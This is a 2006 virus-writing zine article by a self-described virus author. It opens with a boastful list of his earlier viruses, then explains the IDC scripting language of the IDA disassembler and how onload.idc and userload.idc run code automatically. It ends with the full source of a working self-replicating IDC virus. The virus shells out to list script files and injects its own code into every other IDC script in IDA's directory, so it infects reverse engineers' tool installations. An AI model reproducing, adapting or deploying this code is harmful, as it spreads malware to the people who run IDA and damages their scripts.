 |
 |
|||||
 |
 |
 |
 |
 |
 |
|
 |
 |
 |
||||
The IDA Scripting Language
by roy g biv
The IDA Scripting Language
roy g biv / defjam
-= defjam =-
since 1992
bringing you the viruses of tomorrow
today!
Former DOS/Win16 virus writer, author of several virus families, including
Ginger (see Coderz #1 zine for terrible buggy example, contact me for better
sources ;), and Virus Bulletin 9/95 for a description of what they called
Rainbow. Co-author of world's first virus using circular partition trick
(Orsam, coded with Prototype in 1993). Designer of world's first XMS swapping
virus (John Galt, coded by RT Fishel in 1995, only 30 bytes stub, the rest is
swapped out). Author of world's first virus using Thread Local Storage for
replication (Shrug, see Virus Bulletin 6/02 for a description, but they call
it Chiton), world's first virus using Visual Basic 5/6 language extensions for
replication (OU812), world's first Native executable virus (Chthon), world's
first virus using process co-operation to prevent termination (Gemini, see
Virus Bulletin 9/02 for a description), world's first virus using polymorphic
SMTP headers (JunkMail, see Virus Bulletin 11/02 for a description), world's
first viruses that can convert any data files to infectable objects (Pretext),
world's first 32/64-bit parasitic EPO .NET virus (Croissant, see Virus
Bulletin 11/04 for a description, but they call it Impanate), world's first
virus using self-executing HTML (JunkHTMaiL, see Virus Bulletin 7/03 for a
description), world's first virus for Win64 on Intel Itanium (Shrug, see Virus
Bulletin 6/04 for a description, but they call it Rugrat), world's first virus
for Win64 on AMD AMD64 (Shrug), world's first cross-infecting virus for Intel
IA32 and AMD AMD64 (Shrug), world's first viruses that infect Office
applications and script files using the same code (Macaroni, see Virus
Bulletin 11/05 for a description, but they call it Macar), world's first
viruses that can infect both VBS and JScript using the same code (ACDC, see
Virus Bulletin 11/05 for a description, but they call it Cada), world's first
IDA plugin virus (Hidan), world's first viruses that use the Microsoft Script
Encoder to dynamically encrypt the virus body (Screed), and world's first
virus for StarOffice and OpenOffice (Starbucks). Author of various retrovirus
articles (eg see Vlad #7 for the strings that make your code invisible to
TBScan). This is my first virus for IDC. It is the world's first IDC virus.
What is it?
Many people know about the Interactive Disassembler. It is a great tool for
disassembling many different file formats for many different CPUs. It even
has a debugger now, so it can be used for all kinds of reverse-engineering,
unpacking, decrypting, etc. In case that was not enough functionality, it
also supports a language called IDC. In the words of Ilfak, IDC language is a
C-like language. It has the same lexical tokens as C does: character set,
constants, identifiers, keywords, etc. A program in IDC consists of function
declarations.
IDC language
For some years, I wondered if an IDA virus could be possible. When I first
tried in the IDC language, I wanted to infect Windows files. There were some
problems, though. The first problem is that IDA opens a file with full
sharing, but the IDC language does not support doing that, so it is not
possible to infect the file that is being examined. That leaves as an option
to find other files to infect, but there is no enumeration function in the IDC
language. I thought that meant that we can infect only the files that we know
to exist, and that wasn't interesting to me. However, I just needed to ask
the command interpreter to find the files for me. The remaining problem, of
course, is that there is no access to the Windows APIs, so there is no way to
check for protected file. To avoid that, I just decided to infect other IDC
files instead.
IDC programs
Most IDC programs are designed to execute immediately. To do that, they must
contain a function called "main". This function is executed whenever the IDC
file is loaded.
The exception to that rule is the special file called "onload.idc". It
functions like the global template in Microsoft Office. The "OnLoad" function
is called automatically by IDA when a new file is loaded for analysis. There
is another file of similar type, called "userload.idc". It is loaded by the
onload.idc, and the "userload" function is called automatically in that case.
By placing code into either of these two functions, we can be called whenever
IDA starts.
IDC variables
The IDC language supports variables of automatic type (similar to Variants in
OLE2). That means we can assign any letters or numbers or strings to any
variable in one line, and in the next line we can assign anything else. No
need to declare the variable to be of a particular type.
Variables have a scope (a variable declared inside {} are not visible outside)
but there are no global variables.
Just like in C, variable declaration must be the first thing in a function.
The code
To make a replicating text code, we can either carry our own source, or read
it from an already infected file. If our source contains special characters
(like '"' and '\' in IDC), they must be escaped in order to place them into a
string variable. The problem is that after the assignment, they need to be
escaped again when writing to another file. This is the puzzle - how to carry
both transportable and executable source? Instead of solving that, I just
find an infected file and read the source from there. :)
Here is the code, must be a single line:
/*ID10TiC - roy g biv 06/07/06*/
{
auto a,b,c,d,e,f,g,h,i,j;
Exec("%comspec% /c dir /b "+(a=GetIdaDirectory()+"\\idc\\")+"*.idc>r");
//make list of IDC files
while(d>=0) //becomes -1 when all list read
{
b=fopen("r","r");
c=0;
while(!c&&(d=readstr(b))>0) //get filename
{
e=fopen(a+substr(d,0,strlen(d)-1),"r+");
//open potential victim
while((d=readstr(e))>0) //read each line
if(strstr(d,"auto")>0) //look for "auto" line
{
if((f=strstr(d,"/*ID"))>0) //check for infection marker
{
if(!g) //if not read source yet
{
c=1; //set restart flag
g=1; //remember read source
h=substr(d,f,strstr(d,"/"+"}")+2);
//get our source
}
break; //restart
}
if(g) //if read source
{
fseek(e,i=ftell(e)-strlen(d)+strstr(d,59)+1,0);
//seek after ';'
f="";
while((j=readstr(e))>0) //read rest of file
f=f+j;
fseek(e,i,0); //seek after ';'
writestr(e,h+f); //write our source then rest of file
break;
}
}
fclose(e);
}
fclose(b);
}
/**/ //end of code marker with next '}'
}
Greets to friendly people (A-Z):
Active - Benny - Obleak - Prototype - Ratter - Ronin - RT Fishel -
sars - SPTH - The Gingerbread Man - Ultras - uNdErX - Vallez - Vecna -
VirusBuster - Whitehead
rgb/defjam jul 2006
iam_rgb@hotmail.com